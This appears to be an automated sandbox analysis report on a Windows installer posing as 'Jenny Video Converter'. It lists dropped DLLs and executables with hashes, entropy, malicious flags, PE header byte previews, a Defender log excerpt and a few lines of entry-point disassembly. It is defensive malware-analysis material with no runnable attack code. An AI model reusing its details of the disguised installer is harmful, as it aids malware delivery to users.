                                                                          SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                                          MD5:E13FCD8FB16E483E4DE47A036687D904
                                                                          SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                                          SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                                          SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......*... ...,..................@.0@.bss.........P........................`..edata..-....`.......*..............@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):291245
                                                                          Entropy (8bit):6.234245376773595
                                                                          Encrypted:false
                                                                          SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                          MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                          SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                          SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                          SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):706136
                                                                          Entropy (8bit):6.517672165992715
                                                                          Encrypted:false
                                                                          SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                                          MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                                          SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                                          SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                                          SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):248781
                                                                          Entropy (8bit):6.474165596279956
                                                                          Encrypted:false
                                                                          SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                                          MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                                          SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                                          SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                                          SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):248694
                                                                          Entropy (8bit):6.346971642353424
                                                                          Encrypted:false
                                                                          SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                          MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                          SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                          SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                          SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):30994
                                                                          Entropy (8bit):5.666281517516177
                                                                          Encrypted:false
                                                                          SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                                          MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                                          SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                                          SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                                          SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):448557
                                                                          Entropy (8bit):6.353356595345232
                                                                          Encrypted:false
                                                                          SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                          MD5:908111F583B7019D2ED3492435E5092D
                                                                          SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                          SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                          SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):65181
                                                                          Entropy (8bit):6.085572761520829
                                                                          Encrypted:false
                                                                          SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                          MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                          SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                          SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                          SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):720373
                                                                          Entropy (8bit):6.50718990824635
                                                                          Encrypted:false
                                                                          SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURAFDExyFn:nu7eEYCP8trP837szHUA60SLtcV3E9RT
                                                                          MD5:A78837E6F10C665932DAC5D809524995
                                                                          SHA1:91C350A9BDDB14510BD7C7693E4F789251E682E8
                                                                          SHA-256:D42B415E36E2F48CC320391B6EAFE32FC7E9293808A7ACB3758437024DC80099
                                                                          SHA-512:5F569B6BBB584DC6DFBA40D66D92FF1B94EBCE637FB5E51C357D9240C6E7F97B1880CC5ECB13B0157B13DD4C818A758AE759D4256E25A766B3D818BB1E2668A6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:InnoSetup Log Jenny Video Converter, version 0x30, 6042 bytes, 210979\user, "C:\Users\user\AppData\Local\Jenny Video Converter"
                                                                          Category:dropped
                                                                          Size (bytes):6042
                                                                          Entropy (8bit):4.863302378315335
                                                                          Encrypted:false
                                                                          SSDEEP:96:XdWIl4488GpZPwPsS9a+eOIh+TQBjcz8yQgz8fGkqv/aQpXn4cjlxtLcFi1wM:XdWY448JppwjHIhZZM
                                                                          MD5:9ED0C915AFB43B9F4D151FAF05285559
                                                                          SHA1:0BB54118DDC4DAB7ED800B1C162D34EDB8351E44
                                                                          SHA-256:80F14576560062487A4BB2CCC74AB97E38025EAC39209632A4064B537A23EB8A
                                                                          SHA-512:EF1DF0937DCFF466ECE8E4365CFC818EC96FC3FEBB706CDE3EF1439CD1FB0E56FF60B94512BFAA18D0F4841B33D9CD3DB8865E3E62B61A4C2283764C1AE94B5A
                                                                          Malicious:false
                                                                          Preview:Inno Setup Uninstall Log (b)....................................Jenny Video Converter...........................................................................................................Jenny Video Converter...........................................................................................................0...".......%...........................................................................................................................B1.b......Z....210979.user6C:\Users\user\AppData\Local\Jenny Video Converter.................. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):720373
                                                                          Entropy (8bit):6.50718990824635
                                                                          Encrypted:false
                                                                          SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURAFDExyFn:nu7eEYCP8trP837szHUA60SLtcV3E9RT
                                                                          MD5:A78837E6F10C665932DAC5D809524995
                                                                          SHA1:91C350A9BDDB14510BD7C7693E4F789251E682E8
                                                                          SHA-256:D42B415E36E2F48CC320391B6EAFE32FC7E9293808A7ACB3758437024DC80099
                                                                          SHA-512:5F569B6BBB584DC6DFBA40D66D92FF1B94EBCE637FB5E51C357D9240C6E7F97B1880CC5ECB13B0157B13DD4C818A758AE759D4256E25A766B3D818BB1E2668A6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):98626
                                                                          Entropy (8bit):6.478068795827396
                                                                          Encrypted:false
                                                                          SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                                          MD5:70CA53E8B46464CCF956D157501D367A
                                                                          SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                                          SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                                          SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4096
                                                                          Entropy (8bit):4.026670007889822
                                                                          Encrypted:false
                                                                          SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                          MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                          SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                          SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                          SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2560
                                                                          Entropy (8bit):2.8818118453929262
                                                                          Encrypted:false
                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):6144
                                                                          Entropy (8bit):4.215994423157539
                                                                          Encrypted:false
                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23312
                                                                          Entropy (8bit):4.596242908851566
                                                                          Encrypted:false
                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\ZFllSoXpoT.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):709120
                                                                          Entropy (8bit):6.498758763808446
                                                                          Encrypted:false
                                                                          SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURAFDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9RT
                                                                          MD5:C6A64497A14D9C70B36107218E969B1F
                                                                          SHA1:9ED3F09A478E46C8FD4FBAF1F60B7C09938F5A52
                                                                          SHA-256:D6385623CD895C76190DD227FDB8BE40550BAC8CD285BB23B4A0EB57191C8ECD
                                                                          SHA-512:C9A1B961DAD096FEC56C41D625AFE31AEA1CF3455B00CBEF43E9255F7668B42EAC4AC61783DE8C872A0D950140FF4D2A1035E1BD55654A21C4549650F922F64E
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):2464
                                                                          Entropy (8bit):3.2449631311886202
                                                                          Encrypted:false
                                                                          SSDEEP:24:QOaqdmuF3r/r+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxe:FaqdF7/r+AAHdKoqKFxcxkFlh
                                                                          MD5:5886B4704D8084AC1B048EA90DE1D747
                                                                          SHA1:DD2093AAF2FC5E7DEFA644C4399AC8A7AD4096D7
                                                                          SHA-256:5CEBE30A8AC222F25C9869CC8EAD4DA4D90569298EEA410C3D63612B1951F5AC
                                                                          SHA-512:B9A0F887EF10111E825FF4C778A75255335BD6F883D2B61C44829B7A993F5324AA8DAD508DB2D097BB82D7648D4463971ABB9A2C59604027EAA0D2E8686FE051
                                                                          Malicious:false
                                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. M.o.n. .. O.c.t. .. 0.7. .. 2.0.2.4. .0.9.:.1.4.:.3.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.998671154416182
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:ZFllSoXpoT.exe
                                                                          File size:4'517'785 bytes
                                                                          MD5:d4d88602d5675d2a3da77ca8ac8f3293
                                                                          SHA1:f22f4bc29ba04dc1c919400a217eda856e26e39a
                                                                          SHA256:9742c94768e5444d9659d98cd7b695520c16bbcc68153cac93454f4606ee8780
                                                                          SHA512:415fb360c2203db8d522f4738a569db5ff2fe2d92bbed01b32c6f778af0d61e51d4b676e1478c8f8b7476110cef4fff2c5f423c4017a168f9e0d135ba44b47dc
                                                                          SSDEEP:98304:NdzhFsEAljm2ip5tZshT+iyT7h2TQZWvcDRgYWxokSTB/o+dxS:7zXs1ljm2wM+7J8aW0DRuxora
                                                                          TLSH:132633AA1484BD75E113E07456678233EF7A3C80185D50A9349DB07B1EE98DFBA0F7B8
                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                          Icon Hash:2d2e3797b32b2b99
                                                                          Entrypoint:0x409c40
                                                                          Entrypoint Section:CODE
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:1
                                                                          OS Version Minor:0
                                                                          File Version Major:1
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:1
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          add esp, FFFFFFC4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          xor eax, eax
                                                                          mov dword ptr [ebp-10h], eax
                                                                          mov dword ptr [ebp-24h], eax
                                                                          call 00007FF60CB0C91Bh
                                                                          call 00007FF60CB0DB22h
                                                                          call 00007FF60CB0DDB1h
                                                                          call 00007FF60CB0FDE8h
                                                                          call 00007FF60CB0FE2Fh
